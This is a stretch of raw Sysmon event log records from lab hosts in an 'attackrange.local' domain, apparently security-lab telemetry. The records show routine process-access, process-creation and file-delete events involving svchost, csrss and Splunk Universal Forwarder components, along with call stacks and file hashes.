10341000x8000000000000000806472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.908{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000806462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.438{0C1E0330-F350-60EB-4979-00000000D001}9603868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.220{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.220{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.220{0C1E0330-F350-60EB-4979-00000000D001}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3560A814645FCD367141B4DFAEB1A38,SHA256=FF0F961C71A53C797D4814BD4521F2C16F88BA54F0365785A99401DB13FC7685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:25.576{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FF22A25AFBE585E547996BE25D26CE,SHA256=BDFB989C2434C586617F33114C6D171D65A98E329F78321403F983AA450E5953,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 